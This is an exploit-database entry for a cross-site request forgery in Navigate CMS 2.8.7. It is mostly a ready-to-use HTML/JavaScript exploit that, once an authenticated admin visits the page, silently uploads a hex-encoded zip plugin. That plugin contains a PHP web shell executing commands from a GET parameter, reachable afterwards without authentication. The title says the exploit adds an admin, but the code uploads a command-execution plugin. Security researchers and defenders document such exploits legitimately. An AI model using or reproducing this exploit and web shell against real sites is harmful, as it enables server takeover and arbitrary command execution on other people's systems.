Navigate CMS 2.8.7 Cross-Site Request Forgery (Add Admin)

2020.06.08
Credit: Gus Ralph
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin) # Date: 2020-06-04 # Exploit Author: Gus Ralph # Vendor Homepage: https://www.navigatecms.com/en/home # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download # Version: 2.8.7 # Tested on: Ubuntu # CVE: <!-- After having an authenticated admin access this HTML page, simply go to as an unauthenticated user (path may slightly vary depending on installation location): http://DOMAIN.com/navigate/plugins/chiv/chiv.php --> <script> var logUrl = "http://localhost/navigate/navigate.php?fid=extensions&act=extension_upload"; function byteValue(x) { return x.charCodeAt(0) & 0xff; } function toBytes(datastr) { var ords = Array.prototype.map.call(datastr, byteValue); var ui8a = new Uint8Array(ords); return ui8a.buffer; } if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { XMLHttpRequest.prototype.sendAsBinary = function(datastr) { this.send(toBytes(datastr)); } } function fileUpload(fileData, fileName) { var fileSize = fileData.length, boundary = "---------------------------399386530342483226231822376790", uri = logUrl, xhr = new XMLHttpRequest(); var additionalFields = { } var fileFieldName = "extension-upload"; xhr.open("POST", uri, true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8") xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request. xhr.setRequestHeader("Content-Length", fileSize); xhr.withCredentials = "true"; xhr.onreadystatechange = function() { if (xhr.readyState == 4) { if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) { if (xhr.responseText != "") { alert(JSON.parse(xhr.responseText).msg); // display response. } } else if (xhr.status == 0) { $("#goto").show(); } } } var body = ""; for (var i in additionalFields) { if (additionalFields.hasOwnProperty(i)) { body += addField(i, additionalFields[i], boundary); } } body += addFileField(fileFieldName, fileData, fileName, boundary); body += "--" + boundary + "--"; xhr.sendAsBinary(body); return true; } function addField(name, value, boundary) { var c = "--" + boundary + "\r\n" c += "Content-Disposition: form-data; name='" + name + "'\r\n\r\n"; c += value + "\r\n"; return c; } function addFileField(name, value, filename, boundary) { var c = "--" + boundary + "\r\n" c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n"; c += "Content-Type: application/zip\r\n\r\n"; c += value + "\r\n"; return c; } var start = function() { var c = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x1c\x00\x63\x68\x69\x76\x2f\x55\x54\x09\x00\x03\xc2\xe3\xa1\x5e\xdb\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x33\xe2\xa1\x5e\x42\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x55\x8d\x41\x0a\xc2\x30\x10\x45\xf7\x39\xc5\x90\xb5\x34\x48\x17\x42\x57\x4a\xc9\x05\xea\x09\x62\x32\x90\xa0\xe9\x84\x64\x5a\x15\xf1\xee\xda\xd8\x2e\xfc\xcb\xff\x1e\xff\xbf\x04\x7c\x23\x39\xf0\x0d\x65\x07\xf2\x34\xc0\x59\x6b\xd0\x72\xf7\x03\x33\xe6\x12\x68\x5c\xd0\xbe\x69\xdb\xc3\xd6\x9b\x89\x3d\xe5\xa5\xee\x7d\x98\x0d\xd3\x06\xee\x78\x29\x81\xeb\x96\x67\x4e\xa5\x53\xca\x1b\x7b\x8d\xae\x09\xa4\x8e\xf6\x5f\x76\x58\x6c\x0e\x89\xd7\x87\x01\x23\x31\x42\x4f\x31\x9a\xd1\x81\x7e\xa0\x9d\x2a\x5b\x75\x7e\xa6\x3a\xbc\x7d\x88\xb7\xf8\x00\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x18\xe3\xa1\x5e\x06\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x68\x31\x3e\x57\x65\x6c\x63\x6f\x6d\x65\x20\x74\x6f\x20\x43\x68\x69\x76\x61\x74\x6f\x27\x73\x20\x52\x43\x45\x20\x70\x6c\x75\x67\x69\x6e\x20\x66\x6f\x72\x20\x4e\x61\x76\x69\x67\x61\x74\x65\x20\x43\x4d\x53\x2e\x3c\x2f\x68\x31\x3e\x0a\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x09\x00\x03\xb5\xe3\xa1\x5e\xa4\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x3f\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6d\x28\x24\x5f\x47\x45\x54\x5b\x27\x63\x6d\x64\x27\x5d\x29\x3b\x20\x3f\x3e\x0a\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\xff\x41\x00\x00\x00\x00\x63\x68\x69\x76\x2f\x55\x54\x05\x00\x03\xc2\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xff\x81\x3f\x00\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x33\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x0e\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x18\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x98\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x05\x00\x03\xb5\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x05\x06\x00\x00\x00\x00\x04\x00\x04\x00\x4f\x01\x00\x00\xfe\x01\x00\x00\x00\x00" fileUpload(c, "chiv.zip"); }; start(); </script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top